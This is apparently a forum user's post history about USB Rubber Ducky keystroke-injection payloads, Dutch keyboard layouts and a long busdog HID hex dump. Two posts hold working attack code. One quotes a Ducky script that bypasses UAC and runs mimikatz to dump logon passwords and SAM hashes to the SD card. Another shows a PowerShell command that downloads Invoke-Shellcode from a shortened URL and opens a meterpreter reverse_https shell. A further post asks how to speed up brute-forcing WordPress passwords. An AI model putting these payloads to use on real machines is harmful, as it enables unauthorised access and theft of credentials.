Jump to content

hzm74

Active Members
  • Posts

    22
  • Joined

  • Last visited

Posts posted by hzm74

  1. Hello,

    Yesterday I tried this tool called wpscan on kali.

    It is a scanner that scans a website build with Wordpress.

    It can scan for user-names. After that with the help of a wordlist you can try to bruteforce the passwords for these users.

    But I find it not to be very fast.

    Now I'm thinking if it is possible to use another tool like hashcat to do the bruteforcing. Like piping hashcat output to wpscan.

    Does anyone know if this is possible or does know another way to speed things up.

    Thnx, just hoping to learn here!

  2. Here's an updated version using a recommendation from Mubix that should speed it up ever so slightly.

    REM Author: Hak5Darren. Props: shutin, DyFukA, Mubix
    REM Description: Dump local wdigest passwords from memory using mimikatz
    REM Note: Uses c_duck_v2.1 firmware (Twin Duck) to execute mikikatz from
    REM SD card labeled "DUCKY" and save log file as %computername%-passwords.txt
    REM Target: Windows 7 x64 (target win32 with 32-bit binary)
    
    REM *** UAC Bypass ***
    DELAY 2000
    WINDOWS r
    DELAY 200
    STRING powershell Start-Process cmd.exe -Verb runAs
    ENTER
    DELAY 2000
    ALT y
    DELAY 500
    
    REM *** Define DUCKY drive as %duck%
    STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d
    ENTER
    DELAY 500
    
    REM *** Execute mimikatz from SD card and save log file to disk ***
    STRING %duck%\mimikatz_alpha_x64.exe "privilege::debug" "sekurlsa::logonPasswords full" "samdump::hashes" exit > %duck%\%computername%-passwords.txt
    ENTER
    
    REM *** GTFO ***
    STRING exit
    ENTER
    STRING exit
    ENTER
    

    This gives me following error:

    mimikatz(commandline) # privilege::debug"sekurlsa::logonPasswordssamdump::hashes

    ERROR mimikatz_doLocal ; "debug"sekurlsa::logonPasswordssamdump::hashes" command of "privilege" module not found !

    Module : privilege

    Full name : Privilege module

    debug - Ask debug privilege

    LOOK AT: ::logonPasswordssamdump

    I have missing spaces in my commandline.

    This line: STRING %duck%\mimikatz.exe "privilege::debug" "sekurlsa::logonPasswords full" "samdump::hashes" exit > %duck%\%computername%-passwords.txt

    doesn't create spaces in the commandline between debug" "sekurlsa and full" "samdump

    PLEASE HELP. Seems simple?!

  3. Hello,

    Can you explain a little bit more how all the included files work together?!

    What to do to get it work?

    • Do I have to run compiler.bat manually? Do I have to run it to configure the payload (inject.bin)?
    • When I wan't to run the payload, do I need to plugin an extra usb named "JUNK" to get the info copied to this drive?
    • YOU SHOULD EDIT
      THE SP.BAT FILE AND THE INJECT.TXT FILE TO SUIT YOUR REQUIREMENTS. <- What exactly do I need to edit?

    Thnx. A little step by step tutorial would help.

    HzM74

  4. Hello,

    These are the "red"-lines i'm getting:

    C:\Users\*****>powershell ÏEX (New-Object Net.WebClient).DownloadString('http:/
    /bit.ly/14bZZ0c'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -
    Lhost 192.168.3.109 -Lport 8080 -Force"
    The term 'ÏEX' is not recognized as the name of a cmdlet, function, script file
    , or operable program. Check the spelling of the name, or if a path was include
    d, verify that the path is correct and try again.
    At line:1 char:4
    + ÏEX <<<< (New-Object Net.WebClient).DownloadString('http://bit.ly/14bZZ0c');
    Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.3.1
    09 -Lport 8080 -Force
    + CategoryInfo : ObjectNotFound: (ÏEX:String) [], CommandNotFound
    Exception
    + FullyQualifiedErrorId : CommandNotFoundException

    The term 'Invoke-Shellcode' is not recognized as the name of a cmdlet, function
    , script file, or operable program. Check the spelling of the name, or if a pat
    h was included, verify that the path is correct and try again.
    At line:1 char:89
    + ÏEX (New-Object Net.WebClient).DownloadString('http://bit.ly/14bZZ0c'); Invok
    e-Shellcode <<<< -Payload windows/meterpreter/reverse_https -Lhost 192.168.3.1
    09 -Lport 8080 -Force
    + CategoryInfo : ObjectNotFound: (Invoke-Shellcode:String) [], Co
    mmandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException

    Thnx !!

    I believe it is the following:

    'IEX' is changed to 'ÏEX'

    This might be a keyboard language problem?

    Any help suggestions?

  5. Thnx.

    With you're information I realize that I don't need to alter my keyboard mappings. In The Netherlands we use US-international. This is no different than US.\ other than some extra key-functions.

    I now placed a longer delay in my script en the ducky works fine now. No random programs are opened anymore.

    One off-topic question: Is my conclusion wright that with many of the available scripts you need to be logged in as admin-user? When logged in as "normal"-user for example I can't let the Ducky write to the windows directory, even when I run it as admin. This limits the use of the ducky al lot in my opinion. THNX

    HzM74

  6. Hello, thnx for reply.

    Is this the way i should look at it? :

    1. There is a keyboard.properties file. In this file all keys which exist on a keyboard are numbered. For example KEY_A = 4 (this means the letter 'A' is given a number '4'). KEY_ESC=41
    2. Then there is the custom properties-file (for example be.properties). In this file the ascii keys from the keyboard you are using are remapped to the keyboard.properties file.
    3. So i use busdog to scan my keyboard-keys, for example when i type the "escape" button in busdog the hex-code 29 shows up.
    4. To make my custom properties file i do the following (the escape-key as example): ASCII_29 = KEY_ESCAPE

    Is this the way to make my custom file for my keyboard? :

    ASCII_3a = KEY_F1

    ASCII_29 = KEY_ESCAPE

    etc

    etc

    etc

    Thnx in advanced!!

  7. I have an US-International keyboard.

    With busdog i made a scan of all my keys (physical touched every key on my keyboard). I

    What do i need to do now? I notice that not every character is included:

    00 00 29 00 00 00 00 00 ..).....
    00 00 00 00 00 00 00 00 ........
    00 00 3a 00 00 00 00 00 ..:.....
    00 00 00 00 00 00 00 00 ........
    00 00 3b 00 00 00 00 00 ..;.....
    00 00 00 00 00 00 00 00 ........
    00 00 3c 00 00 00 00 00 ..<.....
    00 00 00 00 00 00 00 00 ........
    00 00 3d 00 00 00 00 00 ..=.....
    00 00 00 00 00 00 00 00 ........
    00 00 3e 00 00 00 00 00 ..>.....
    00 00 00 00 00 00 00 00 ........
    00 00 3f 00 00 00 00 00 ..?.....
    00 00 00 00 00 00 00 00 ........
    00 00 40 00 00 00 00 00 ..@.....
    00 00 00 00 00 00 00 00 ........
    00 00 41 00 00 00 00 00 ..A.....
    00 00 00 00 00 00 00 00 ........
    00 00 42 00 00 00 00 00 ..B.....
    00 00 00 00 00 00 00 00 ........
    00 00 43 00 00 00 00 00 ..C.....
    00 00 00 00 00 00 00 00 ........
    00 00 44 00 00 00 00 00 ..D.....
    00 00 00 00 00 00 00 00 ........
    00 00 45 00 00 00 00 00 ..E.....
    00 00 00 00 00 00 00 00 ........
    00 00 35 00 00 00 00 00 ..5.....
    00 00 00 00 00 00 00 00 ........
    00 00 1e 00 00 00 00 00 ........
    00 00 00 00 00 00 00 00 ........
    00 00 1f 00 00 00 00 00 ........
    00 00 00 00 00 00 00 00 ........
    00 00 20 00 00 00 00 00 .. .....
    00 00 00 00 00 00 00 00 ........
    00 00 21 00 00 00 00 00 ..!.....
    00 00 00 00 00 00 00 00 ........
    00 00 22 00 00 00 00 00 ..".....
    00 00 00 00 00 00 00 00 ........
    00 00 23 00 00 00 00 00 ..#.....
    00 00 00 00 00 00 00 00 ........
    00 00 24 00 00 00 00 00 ..$.....
    00 00 00 00 00 00 00 00 ........
    00 00 25 00 00 00 00 00 ..%.....
    00 00 00 00 00 00 00 00 ........
    00 00 26 00 00 00 00 00 ..&.....
    00 00 00 00 00 00 00 00 ........
    00 00 27 00 00 00 00 00 ..'.....
    00 00 00 00 00 00 00 00 ........
    00 00 2d 00 00 00 00 00 ..-.....
    00 00 00 00 00 00 00 00 ........
    00 00 2e 00 00 00 00 00 ........
    00 00 00 00 00 00 00 00 ........
    00 00 2a 00 00 00 00 00 ..*.....
    00 00 00 00 00 00 00 00 ........
    00 00 2b 00 00 00 00 00 ..+.....
    00 00 00 00 00 00 00 00 ........
    00 00 14 00 00 00 00 00 ........
    00 00 00 00 00 00 00 00 ........
    00 00 1a 00 00 00 00 00 ........
    00 00 00 00 00 00 00 00 ........
    00 00 08 00 00 00 00 00 ........
    00 00 00 00 00 00 00 00 ........
    00 00 15 00 00 00 00 00 ........
    00 00 00 00 00 00 00 00 ........
    00 00 17 00 00 00 00 00 ........
    00 00 00 00 00 00 00 00 ........
    00 00 1c 00 00 00 00 00 ........
    00 00 00 00 00 00 00 00 ........
    00 00 18 00 00 00 00 00 ........
    00 00 00 00 00 00 00 00 ........
    00 00 0c 00 00 00 00 00 ........
    00 00 00 00 00 00 00 00 ........
    00 00 12 00 00 00 00 00 ........
    00 00 00 00 00 00 00 00 ........
    00 00 13 00 00 00 00 00 ........
    00 00 00 00 00 00 00 00 ........
    00 00 2f 00 00 00 00 00 ../.....
    00 00 00 00 00 00 00 00 ........
    00 00 30 00 00 00 00 00 ..0.....
    00 00 00 00 00 00 00 00 ........
    00 00 31 00 00 00 00 00 ..1.....
    00 00 00 00 00 00 00 00 ........
    00 00 39 00 00 00 00 00 ..9.....
    03 .
    00 00 00 00 00 00 00 00 ........
    00 00 04 00 00 00 00 00 ........
    00 00 00 00 00 00 00 00 ........
    00 00 16 00 00 00 00 00 ........
    00 00 00 00 00 00 00 00 ........
    00 00 07 00 00 00 00 00 ........
    00 00 00 00 00 00 00 00 ........
    00 00 09 00 00 00 00 00 ........
    00 00 00 00 00 00 00 00 ........
    00 00 0a 00 00 00 00 00 ........
    00 00 00 00 00 00 00 00 ........
    00 00 0b 00 00 00 00 00 ........
    00 00 00 00 00 00 00 00 ........
    00 00 0d 00 00 00 00 00 ........
    00 00 00 00 00 00 00 00 ........
    00 00 0e 00 00 00 00 00 ........
    00 00 00 00 00 00 00 00 ........
    00 00 0f 00 00 00 00 00 ........
    00 00 00 00 00 00 00 00 ........
    00 00 33 00 00 00 00 00 ..3.....
    00 00 00 00 00 00 00 00 ........
    00 00 34 00 00 00 00 00 ..4.....
    00 00 00 00 00 00 00 00 ........
    00 00 28 00 00 00 00 00 ..(.....
    00 00 00 00 00 00 00 00 ........
    02 00 00 00 00 00 00 00 ........
    00 00 00 00 00 00 00 00 ........
    00 00 1d 00 00 00 00 00 ........
    00 00 00 00 00 00 00 00 ........
    00 00 1b 00 00 00 00 00 ........
    00 00 00 00 00 00 00 00 ........
    00 00 06 00 00 00 00 00 ........
    00 00 00 00 00 00 00 00 ........
    00 00 19 00 00 00 00 00 ........
    00 00 00 00 00 00 00 00 ........
    00 00 05 00 00 00 00 00 ........
    00 00 00 00 00 00 00 00 ........
    00 00 11 00 00 00 00 00 ........
    00 00 00 00 00 00 00 00 ........
    00 00 10 00 00 00 00 00 ........
    00 00 00 00 00 00 00 00 ........
    00 00 36 00 00 00 00 00 ..6.....
    00 00 00 00 00 00 00 00 ........
    00 00 37 00 00 00 00 00 ..7.....
    00 00 00 00 00 00 00 00 ........
    00 00 38 00 00 00 00 00 ..8.....
    00 00 00 00 00 00 00 00 ........
    20 00 00 00 00 00 00 00 .......
    00 00 00 00 00 00 00 00 ........
    01 00 00 00 00 00 00 00 ........
    00 00 00 00 00 00 00 00 ........
    08 00 00 00 00 00 00 00 ........
    00 00 00 00 00 00 00 00 ........
    04 00 00 00 00 00 00 00 ........
    00 00 00 00 00 00 00 00 ........
    00 00 2c 00 00 00 00 00 ..,.....
    00 00 00 00 00 00 00 00 ........
    40 00 00 00 00 00 00 00 @.......
    00 00 00 00 00 00 00 00 ........
    80 00 00 00 00 00 00 00 ........
    00 00 00 00 00 00 00 00 ........
    00 00 65 00 00 00 00 00 ..e.....
    00 00 00 00 00 00 00 00 ........
    10 00 00 00 00 00 00 00 ........
    00 00 00 00 00 00 00 00 ........
    00 00 46 00 00 00 00 00 ..F.....
    00 00 00 00 00 00 00 00 ........
    00 00 47 00 00 00 00 00 ..G.....
    07 .
    00 00 00 00 00 00 00 00 ........
    00 00 48 00 00 00 00 00 ..H.....
    00 00 00 00 00 00 00 00 ........
    00 00 49 00 00 00 00 00 ..I.....
    00 00 00 00 00 00 00 00 ........
    00 00 4a 00 00 00 00 00 ..J.....
    00 00 00 00 00 00 00 00 ........
    00 00 4b 00 00 00 00 00 ..K.....
    00 00 00 00 00 00 00 00 ........
    00 00 4c 00 00 00 00 00 ..L.....
    00 00 00 00 00 00 00 00 ........
    00 00 4d 00 00 00 00 00 ..M.....
    00 00 00 00 00 00 00 00 ........
    00 00 4e 00 00 00 00 00 ..N.....
    00 00 00 00 00 00 00 00 ........
    00 00 52 00 00 00 00 00 ..R.....
    00 00 00 00 00 00 00 00 ........
    00 00 50 00 00 00 00 00 ..P.....
    00 00 00 00 00 00 00 00 ........
    00 00 51 00 00 00 00 00 ..Q.....
    00 00 00 00 00 00 00 00 ........
    00 00 4f 00 00 00 00 00 ..O.....
    00 00 00 00 00 00 00 00 ........
    00 00 53 00 00 00 00 00 ..S.....
    06 .
    00 00 00 00 00 00 00 00 ........
    00 00 54 00 00 00 00 00 ..T.....
    00 00 00 00 00 00 00 00 ........
    00 00 55 00 00 00 00 00 ..U.....
    00 00 00 00 00 00 00 00 ........
    00 00 56 00 00 00 00 00 ..V.....
    00 00 00 00 00 00 00 00 ........
    00 00 60 00 00 00 00 00 ..`.....
    00 00 61 00 00 00 00 00 ..a.....
    00 00 00 00 00 00 00 00 ........
    00 00 57 00 00 00 00 00 ..W.....
    00 00 00 00 00 00 00 00 ........
    00 00 5d 00 00 00 00 00 ..].....
    00 00 62 00 00 00 00 00 ..b.....
    00 00 63 00 00 00 00 00 ..c.....
    00 00 00 00 00 00 00 00 ........
    00 00 58 00 00 00 00 00 ..X.....
    00 00 00 00 00 00 00 00 ........
    02 00 00 00 00 00 00 00 ........
    02 00 35 00 00 00 00 00 ..5.....
    02 00 00 00 00 00 00 00 ........
    00 00 00 00 00 00 00 00 ........
    02 00 00 00 00 00 00 00 ........
    02 00 1e 00 00 00 00 00 ........
    02 00 00 00 00 00 00 00 ........
    02 00 1f 00 00 00 00 00 ........
    02 00 00 00 00 00 00 00 ........
    02 00 20 00 00 00 00 00 .. .....
    02 00 00 00 00 00 00 00 ........
    02 00 21 00 00 00 00 00 ..!.....
    02 00 00 00 00 00 00 00 ........
    02 00 22 00 00 00 00 00 ..".....
    02 00 00 00 00 00 00 00 ........
    02 00 23 00 00 00 00 00 ..#.....
    02 00 00 00 00 00 00 00 ........
    02 00 24 00 00 00 00 00 ..$.....
    02 00 00 00 00 00 00 00 ........
    02 00 25 00 00 00 00 00 ..%.....
    02 00 00 00 00 00 00 00 ........
    02 00 26 00 00 00 00 00 ..&.....
    02 00 00 00 00 00 00 00 ........
    02 00 27 00 00 00 00 00 ..'.....
    02 00 00 00 00 00 00 00 ........
    02 00 2d 00 00 00 00 00 ..-.....
    02 00 00 00 00 00 00 00 ........
    02 00 2e 00 00 00 00 00 ........
    02 00 00 00 00 00 00 00 ........
    02 00 2a 00 00 00 00 00 ..*.....
    02 00 00 00 00 00 00 00 ........
    02 00 2b 00 00 00 00 00 ..+.....
    02 00 00 00 00 00 00 00 ........
    02 00 14 00 00 00 00 00 ........
    02 00 00 00 00 00 00 00 ........
    02 00 1a 00 00 00 00 00 ........
    02 00 00 00 00 00 00 00 ........
    02 00 08 00 00 00 00 00 ........
    02 00 00 00 00 00 00 00 ........
    02 00 15 00 00 00 00 00 ........
    02 00 00 00 00 00 00 00 ........
    02 00 17 00 00 00 00 00 ........
    02 00 00 00 00 00 00 00 ........
    02 00 1c 00 00 00 00 00 ........
    02 00 00 00 00 00 00 00 ........
    02 00 18 00 00 00 00 00 ........
    02 00 00 00 00 00 00 00 ........
    02 00 0c 00 00 00 00 00 ........
    02 00 00 00 00 00 00 00 ........
    02 00 12 00 00 00 00 00 ........
    02 00 00 00 00 00 00 00 ........
    02 00 13 00 00 00 00 00 ........
    02 00 00 00 00 00 00 00 ........
    02 00 2f 00 00 00 00 00 ../.....
    02 00 00 00 00 00 00 00 ........
    02 00 30 00 00 00 00 00 ..0.....
    02 00 00 00 00 00 00 00 ........
    02 00 31 00 00 00 00 00 ..1.....
    02 00 00 00 00 00 00 00 ........
    02 00 39 00 00 00 00 00 ..9.....
    04 .
    02 00 00 00 00 00 00 00 ........
    02 00 04 00 00 00 00 00 ........
    02 00 00 00 00 00 00 00 ........
    02 00 16 00 00 00 00 00 ........
    02 00 00 00 00 00 00 00 ........
    02 00 07 00 00 00 00 00 ........
    02 00 00 00 00 00 00 00 ........
    02 00 09 00 00 00 00 00 ........
    02 00 00 00 00 00 00 00 ........
    02 00 0a 00 00 00 00 00 ........
    02 00 00 00 00 00 00 00 ........
    02 00 0b 00 00 00 00 00 ........
    02 00 00 00 00 00 00 00 ........
    02 00 0d 00 00 00 00 00 ........
    02 00 00 00 00 00 00 00 ........
    02 00 0e 00 00 00 00 00 ........
    02 00 00 00 00 00 00 00 ........
    02 00 0f 00 00 00 00 00 ........
    02 00 00 00 00 00 00 00 ........
    02 00 33 00 00 00 00 00 ..3.....
    02 00 00 00 00 00 00 00 ........
    02 00 34 00 00 00 00 00 ..4.....
    02 00 00 00 00 00 00 00 ........
    02 00 28 00 00 00 00 00 ..(.....
    02 00 00 00 00 00 00 00 ........
    02 00 1d 00 00 00 00 00 ........
    02 00 00 00 00 00 00 00 ........
    02 00 1b 00 00 00 00 00 ........
    02 00 00 00 00 00 00 00 ........
    02 00 06 00 00 00 00 00 ........
    02 00 00 00 00 00 00 00 ........
    02 00 19 00 00 00 00 00 ........
    02 00 00 00 00 00 00 00 ........
    02 00 05 00 00 00 00 00 ........
    02 00 00 00 00 00 00 00 ........
    02 00 11 00 00 00 00 00 ........
    02 00 00 00 00 00 00 00 ........
    02 00 10 00 00 00 00 00 ........
    02 00 00 00 00 00 00 00 ........
    02 00 36 00 00 00 00 00 ..6.....
    02 00 00 00 00 00 00 00 ........
    02 00 37 00 00 00 00 00 ..7.....
    02 00 00 00 00 00 00 00 ........
    02 00 38 00 00 00 00 00 ..8.....
    02 00 00 00 00 00 00 00 ........
    22 00 00 00 00 00 00 00 ".......
    02 00 00 00 00 00 00 00 ........
    03 00 00 00 00 00 00 00 ........
    02 00 00 00 00 00 00 00 ........
    0a 00 00 00 00 00 00 00 ........
    02 00 00 00 00 00 00 00 ........
    06 00 00 00 00 00 00 00 ........
    02 00 00 00 00 00 00 00 ........
    02 00 2c 00 00 00 00 00 ..,.....
    02 00 00 00 00 00 00 00 ........
    42 00 00 00 00 00 00 00 B.......
    02 00 00 00 00 00 00 00 ........
    82 00 00 00 00 00 00 00 ........
    02 00 00 00 00 00 00 00 ........
    02 00 65 00 00 00 00 00 ..e.....
    02 00 00 00 00 00 00 00 ........
    12 00 00 00 00 00 00 00 ........
    02 00 00 00 00 00 00 00 ........
    02 00 50 00 00 00 00 00 ..P.....
    02 00 00 00 00 00 00 00 ........
    02 00 4f 00 00 00 00 00 ..O.....
    02 00 00 00 00 00 00 00 ........
    02 00 51 00 00 00 00 00 ..Q.....
    02 00 00 00 00 00 00 00 ........
    02 00 52 00 00 00 00 00 ..R.....
    02 00 00 00 00 00 00 00 ........
    02 00 46 00 00 00 00 00 ..F.....
    02 00 00 00 00 00 00 00 ........
    02 00 47 00 00 00 00 00 ..G.....
    00 .
    02 00 00 00 00 00 00 00 ........
    02 00 48 00 00 00 00 00 ..H.....
    02 00 00 00 00 00 00 00 ........
    00 00 00 00 00 00 00 00 ........
    01 00 00 00 00 00 00 00 ........
    01 00 35 00 00 00 00 00 ..5.....
    01 00 00 00 00 00 00 00 ........
    01 00 1e 00 00 00 00 00 ........
    01 00 00 00 00 00 00 00 ........
    01 00 1f 00 00 00 00 00 ........
    01 00 00 00 00 00 00 00 ........
    01 00 20 00 00 00 00 00 .. .....
    01 00 00 00 00 00 00 00 ........
    01 00 21 00 00 00 00 00 ..!.....
    01 00 00 00 00 00 00 00 ........
    01 00 22 00 00 00 00 00 ..".....
    01 00 00 00 00 00 00 00 ........
    01 00 23 00 00 00 00 00 ..#.....
    01 00 00 00 00 00 00 00 ........
    01 00 24 00 00 00 00 00 ..$.....
    01 00 00 00 00 00 00 00 ........
    01 00 25 00 00 00 00 00 ..%.....
    01 00 00 00 00 00 00 00 ........
    01 00 26 00 00 00 00 00 ..&.....
    01 00 00 00 00 00 00 00 ........
    01 00 27 00 00 00 00 00 ..'.....
    01 00 00 00 00 00 00 00 ........
    01 00 2d 00 00 00 00 00 ..-.....
    01 00 00 00 00 00 00 00 ........
    01 00 2e 00 00 00 00 00 ........
    01 00 00 00 00 00 00 00 ........
    01 00 2a 00 00 00 00 00 ..*.....
    01 00 00 00 00 00 00 00 ........
    00 00 00 00 00 00 00 00 ........
    01 00 00 00 00 00 00 00 ........
    01 00 29 00 00 00 00 00 ..).....
    01 00 00 00 00 00 00 00 ........
    00 00 00 00 00 00 00 00 ........
    00 00 29 00 00 00 00 00 ..).....
    00 00 00 00 00 00 00 00 ........
    00 00 39 00 00 00 00 00 ..9.....
    02 .
    00 00 00 00 00 00 00 00 ........
    00 00 14 00 00 00 00 00 ........
    00 00 00 00 00 00 00 00 ........
    00 00 39 00 00 00 00 00 ..9.....
    00 .
    00 00 00 00 00 00 00 00 ........
    00 00 14 00 00 00 00 00 ........
    00 00 00 00 00 00 00 00 ........
    00 00 0e 00 00 00 00 00 ........
    00 00 0e 08 00 00 00 00 ........
    00 00 08 00 00 00 00 00 ........
    00 00 00 00 00 00 00 00 ........
    00 00 1c 00 00 00 00 00 ........
    00 00 00 00 00 00 00 00 ........
    00 00 05 00 00 00 00 00 ........
    00 00 00 00 00 00 00 00 ........
    00 00 12 00 00 00 00 00 ........
    00 00 00 00 00 00 00 00 ........
    00 00 1a 00 00 00 00 00 ........
    00 00 00 00 00 00 00 00 ........
    00 00 2a 00 00 00 00 00 ..*.....
    00 00 00 00 00 00 00 00 ........
    00 00 04 00 00 00 00 00 ........
    00 00 04 15 00 00 00 00 ........
    00 00 15 00 00 00 00 00 ........
    00 00 00 00 00 00 00 00 ........
    00 00 07 00 00 00 00 00 ........
    00 00 00 00 00 00 00 00 ........
    00 00 2c 00 00 00 00 00 ..,.....
    00 00 00 00 00 00 00 00 ........
    00 00 17 00 00 00 00 00 ........
    00 00 17 15 00 00 00 00 ........
    00 00 15 00 00 00 00 00 ........
    00 00 00 00 00 00 00 00 ........
    00 00 04 00 00 00 00 00 ........
    00 00 00 00 00 00 00 00 ........
    00 00 06 00 00 00 00 00 ........
    00 00 00 00 00 00 00 00 ........
    00 00 08 00 00 00 00 00 ........
    00 00 00 00 00 00 00 00 ........
    00 00 2c 00 00 00 00 00 ..,.....
    00 00 00 00 00 00 00 00 ........
    20 00 00 00 00 00 00 00 .......
    20 00 18 00 00 00 00 00 .......
    20 00 00 00 00 00 00 00 .......
    20 00 16 00 00 00 00 00 .......
    20 00 00 00 00 00 00 00 .......
    00 00 00 00 00 00 00 00 ........
    00 00 2d 00 00 00 00 00 ..-.....
    00 00 00 00 00 00 00 00 ........
    20 00 00 00 00 00 00 00 .......
    20 00 0c 00 00 00 00 00 .......
    20 00 00 00 00 00 00 00 .......
    20 00 11 00 00 00 00 00 .......
    20 00 00 00 00 00 00 00 .......
    20 00 17 00 00 00 00 00 .......
    20 00 00 00 00 00 00 00 .......
    00 00 00 00 00 00 00 00 ........

  8. Hello,

    Is there a difference between keyboard "United States" and "United States International" ?

    I assume standard keyboard settings for ducky is "United States"

    I live in The Netherlands and i have "United States International"

    Ducky is working for me at the moment. I'm willing to make Dutch Keyboard settings, but i don't know how exactly.

    Thnx in advanced.

    Edit: International is with dead-keys, plain United States not.

    Gonna change my win7 keyboard to US instead of US-International.

    Maybe the ducky is gonna work ?!

  9. Hello,

    I'm from The Netherlands. I have bought a rubber ducky.

    Notting happend when i insert it in my win7 x64 pc.

    So i'm thinking this is because of the keyboard language.

    Om the other end this is strange because i believe we also use the american-international format.

    I read about the busdog application.

    Look at the attached file (printscreen busdog)

    I typed "qwerty". What do i need to do with this info?

    Thnx in advanced.

    HzM74

×
×
  • Create New...